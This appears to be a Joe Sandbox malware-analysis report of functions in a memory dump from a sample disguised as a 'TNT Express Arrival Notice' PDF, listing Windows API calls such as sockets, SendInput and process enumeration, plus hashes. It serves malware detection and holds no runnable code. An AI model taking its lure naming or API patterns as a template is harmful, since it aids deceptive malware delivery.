Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 37f45edf08fe617dbe073eef0b571e2933060c380e6d1fc6dba8ef7b8e91d439
Instruction ID: 4e4be584f139278d68874a0b77b9bc50c039918c8364dca8035442fc1b832ec2
Opcode Fuzzy Hash: 37f45edf08fe617dbe073eef0b571e2933060c380e6d1fc6dba8ef7b8e91d439
Instruction Fuzzy Hash: 5711D2B12002156BCF00BF75AC95FED37AAEFC4314F048079B909AB296DE349A499B70

Function 00955882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009558C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009558EE
DrawMenuBar.USER32(?), ref: 009558FD

Strings

0, xrefs: 0095588F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 400c4c5824c4983548673a7ac5426dbfe4af15f57eacf51df2d14c2c0f6e13d3
Instruction ID: f3220cfd35103b382055d7adb6da39671ff6a8adbb443bfb8a8e92e0fb61eac5
Opcode Fuzzy Hash: 400c4c5824c4983548673a7ac5426dbfe4af15f57eacf51df2d14c2c0f6e13d3
Instruction Fuzzy Hash: 5E01C431504208EFDB109F52DC44BAEBBB8FF45362F008099F849DA262DB348A84EF21

Function 0091D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0091D3BF
FreeLibrary.KERNEL32 ref: 0091D3E5

Strings

X64, xrefs: 0091D2A8
GetSystemWow64DirectoryW, xrefs: 0091D3B9

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 015db444f501a023acbe0be713dc2486793531c97fc4e3c270087c67265cd715
Instruction ID: 1ea8979c78ffb1b6512f49e68bf5e7bb457d5224111fc272a447881b0f21ac9a
Opcode Fuzzy Hash: 015db444f501a023acbe0be713dc2486793531c97fc4e3c270087c67265cd715
Instruction Fuzzy Hash: BCF055B1B0BB398FD73552114C989ED3328AF01706B54491AE832E2245EB34CDC8D3D2

Function 0092007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 739494643d9915c7ed0c8c161f91982d068ab5d7acbe7e5da75b7d67f954ace2
Instruction ID: 39818a4c3e790dce466fc9b77e1c8381bdeb4a288ed674d31074995da1e1123c
Opcode Fuzzy Hash: 739494643d9915c7ed0c8c161f91982d068ab5d7acbe7e5da75b7d67f954ace2
Instruction Fuzzy Hash: 6FC16C75A0022AEFDB14CFA4D894EAEB7B9FF88304F108599E505EB256D731ED41CB90

Function 0094342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00943459
CoUninitialize.OLE32 ref: 00943463
VariantInit.OLEAUT32(?), ref: 0094346E
VariantClear.OLEAUT32(?), ref: 0094371B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 0f2bd851289aea0bdc065efea8c23fe2d21b8188c565a9542fd2268c4c5f0a30
Instruction ID: 7d6416cac69087bd38a9de4867e3e7756ce1e14431b10a6a672f2ce0a7f81460
Opcode Fuzzy Hash: 0f2bd851289aea0bdc065efea8c23fe2d21b8188c565a9542fd2268c4c5f0a30
Instruction Fuzzy Hash: ABA1F3756046019FCB10DF28C585E2AB7E9FF88714F05895DF98A9B362DB30EE019B92

Function 00920436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0095FC08,?), ref: 009205F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0095FC08,?), ref: 00920608
CLSIDFromProgID.OLE32(?,?,00000000,0095CC40,000000FF,?,00000000,00000800,00000000,?,0095FC08,?), ref: 0092062D
_memcmp.LIBVCRUNTIME ref: 0092064E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: e4341db1d26601766fdec93356a70f335f71166c6d3f2f8d030b1b1251b7a0dc
Instruction ID: b5de89f8627ce8a0aee5755ca4bb29224d1af6d5da9a9549622728f646fc7aa7
Opcode Fuzzy Hash: e4341db1d26601766fdec93356a70f335f71166c6d3f2f8d030b1b1251b7a0dc
Instruction Fuzzy Hash: 4A81FA71A00219EFCB04DF94C988EEEB7B9FF89315F204558F506AB255DB71AE06CB60

Function 00901391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009014C0

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 48005dcb1e03facc96748a76c87bdc53909bb9d187e27bca91c8b15d80e99129
Instruction ID: ce7e261ba5350dfd53a66bfadec6e6a79c82079a1997c4d5d1fe1c4c1fe41fc5
Opcode Fuzzy Hash: 48005dcb1e03facc96748a76c87bdc53909bb9d187e27bca91c8b15d80e99129
Instruction Fuzzy Hash: 9F414831A00615AFDB256BBE8C46BBE3AA8FF52370F244625F618D71F2E77488415363

Function 00956278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00EAF648,?), ref: 009562E2
ScreenToClient.USER32(?,?), ref: 00956315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00956382

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 85bc3fe41bc8816471f61b34d17f156b1fc2182f5d17cc8fe57bbc1bfd5df6b9
Instruction ID: aadbfc25689dd432f418cb2635386a23fd4bd83b9b17b2f35d29f549bb3bb892
Opcode Fuzzy Hash: 85bc3fe41bc8816471f61b34d17f156b1fc2182f5d17cc8fe57bbc1bfd5df6b9
Instruction Fuzzy Hash: 0A513A74A00209EFCF14DF69D880AAE7BB9FB45361F508169F8259B2A0D730EE85DB50

Function 00941AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00941AFD
WSAGetLastError.WSOCK32 ref: 00941B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00941B8A
WSAGetLastError.WSOCK32 ref: 00941B94

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: ca448675349af9cee715dc7f0d709d59764647fa1c66d19ad6b16a5553fecfdb
Instruction ID: daaca1e7ca34c0bf2056bf22be91233de9c194703598874f316fdbd991cfcee6
Opcode Fuzzy Hash: ca448675349af9cee715dc7f0d709d59764647fa1c66d19ad6b16a5553fecfdb
Instruction Fuzzy Hash: 36418F74600200AFE720AF28C886F2977E5EB44718F54855CF91A9F7D2EB72DD828B91

Function 008FB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8aca61afae5c56779209aa9a6e1d06d595d07c8e5d5030b76243618bca5694
Instruction ID: e2abd9af54cd6ce806b1c4021bf004976343a2cfa872081aa51182a49dd3a966
Opcode Fuzzy Hash: fd8aca61afae5c56779209aa9a6e1d06d595d07c8e5d5030b76243618bca5694
Instruction Fuzzy Hash: A2410875A00708AFD724AF3CCC41B7ABBE9FB98710F10452AF651DB682E771A9018B80

Function 009356D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00935783
GetLastError.KERNEL32(?,00000000), ref: 009357A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009357CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009357FA

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 6c9c28897bd4c90a4fb8368a682b7a4285572f68b12b791ee34b79471cbfda4e
Instruction ID: 93532774fe288395806c84ed4577d39a60d8ee4c7c6e100e2a2b93933b82bf8c
Opcode Fuzzy Hash: 6c9c28897bd4c90a4fb8368a682b7a4285572f68b12b791ee34b79471cbfda4e
Instruction Fuzzy Hash: 3F41F735600610DFCB11DF19C445A1ABBF6EF89320B198488E84AAB362CB34ED019F92

Function 008FD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,008E6D71,00000000,00000000,008E82D9,?,008E82D9,?,00000001,008E6D71,8BE85006,00000001,008E82D9,008E82D9), ref: 008FD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008FD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008FD9AB
__freea.LIBCMT ref: 008FD9B4

Part of subcall function 008F3820: RtlAllocateHeap.NTDLL(00000000,?,00991444,?,008DFDF5,?,?,008CA976,00000010,00991440,008C13FC,?,008C13C6,?,008C1129), ref: 008F3852

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2e9cd2985a3b478ae7ffb6e332a5c8f135068bf5e2d423d936816415fdcd28a4
Instruction ID: b82568c37ea9d477bef9039e44a0cb3645a471c278a5f0403e07dd0a22608b98
Opcode Fuzzy Hash: 2e9cd2985a3b478ae7ffb6e332a5c8f135068bf5e2d423d936816415fdcd28a4
Instruction Fuzzy Hash: E631CE72A1030AABDF249FB5DC45EBE7BA6FB41310B050168FE04DA250EB75CD50CBA0

Function 009552C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00955352
GetWindowLongW.USER32(?,000000F0), ref: 00955375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00955382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009553A8

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 50272dfaae72e0973e939fca435786c14ee732f72ced5c4c25b2425f7cd4f9af
Instruction ID: 24cfcfb6c0ef5d320db48ba09de2dd72178eb46d8ebf69b3069ea1e39c0b7022
Opcode Fuzzy Hash: 50272dfaae72e0973e939fca435786c14ee732f72ced5c4c25b2425f7cd4f9af
Instruction Fuzzy Hash: 85310630A55A08EFEB30DF16CC25BE83769EB043D2F594002FE08961E2C3B49D88E741

Function 0092AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0092ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0092AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0092AC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0092ACC6

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 929532d3dfa22ff5d6503e90605397240586bbc04803372a8b1b6a03c73f8e5c
Instruction ID: c5e96fa32d39a8590f62a92f6f17a8de626ceace17e6f5d348af293eaddfe2b8
Opcode Fuzzy Hash: 929532d3dfa22ff5d6503e90605397240586bbc04803372a8b1b6a03c73f8e5c
Instruction Fuzzy Hash: 8D312872A04328AFFF34CF65EC047FE7BA9AB85310F04461AE4C5521E9C3788D859792

Function 00957674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0095769A
GetWindowRect.USER32(?,?), ref: 00957710
PtInRect.USER32(?,?,00958B89), ref: 00957720
MessageBeep.USER32(00000000), ref: 0095778C

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: cf1a949670fe0f0adf6a2445f21a55cf2fda20f8c2c5d3e95f0e884fa1497d28
Instruction ID: c2eb650e33c6f5a10bee28c66cb43d2d321c41e469a5564f62a85977a27105a4
Opcode Fuzzy Hash: cf1a949670fe0f0adf6a2445f21a55cf2fda20f8c2c5d3e95f0e884fa1497d28
Instruction Fuzzy Hash: 5741AD34609215DFCB02CF9AF894FA9B7F4FB49302F1440A9E8149B261C330AA4ADF90

Function 009516DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009516EB

Part of subcall function 00923A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00923A57
Part of subcall function 00923A3D: GetCurrentThreadId.KERNEL32 ref: 00923A5E
Part of subcall function 00923A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009225B3), ref: 00923A65

GetCaretPos.USER32(?), ref: 009516FF
ClientToScreen.USER32(00000000,?), ref: 0095174C
GetForegroundWindow.USER32 ref: 00951752

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 0ebf2bd2c87f1ec542af00ed488f3b84362ca2587a93b30732747a1269c8aee2
Instruction ID: b495c3d131bee7a685ec4c3a902defb6ea1156f7068ba54f881c248f5ade60ca
Opcode Fuzzy Hash: 0ebf2bd2c87f1ec542af00ed488f3b84362ca2587a93b30732747a1269c8aee2
Instruction Fuzzy Hash: 51313071D00249AFC700DFAAC881DAEB7F9FF48304B508069E415E7211E635DE45CBA1

Function 0092D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0092D501
Process32FirstW.KERNEL32(00000000,?), ref: 0092D50F
Process32NextW.KERNEL32(00000000,?), ref: 0092D52F
CloseHandle.KERNEL32(00000000), ref: 0092D5DC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 2313e2ea137772a457188fb475378c7297fd7f5e9f35a98eb5ba0ce6a02df3e7
Instruction ID: b946e45c5de8e1028d53293b1e67914d359e087428d029047f5092fe9ac07234
Opcode Fuzzy Hash: 2313e2ea137772a457188fb475378c7297fd7f5e9f35a98eb5ba0ce6a02df3e7
Instruction Fuzzy Hash: 66314D711083009FD305EF64D885EAABBF8EF99354F14092DF585862A1EB71E949CBA3

Function 00958FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

GetCursorPos.USER32(?), ref: 00959001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00917711,?,?,?,?,?), ref: 00959016
GetCursorPos.USER32(?), ref: 0095905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00917711,?,?,?), ref: 00959094

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 6b5f63352190d88bf072fb89af456f851ed2583c9627e6f39569cdee10a5182c
Instruction ID: bb09bc365e38eee57214a9bc7707f3db029867ad6c9dad10ff23f0d1eabd8254
Opcode Fuzzy Hash: 6b5f63352190d88bf072fb89af456f851ed2583c9627e6f39569cdee10a5182c
Instruction Fuzzy Hash: 0A21BF31611118EFEB25CFAACC58EEB3BB9FB49362F044455F905872A1C3319990EB60

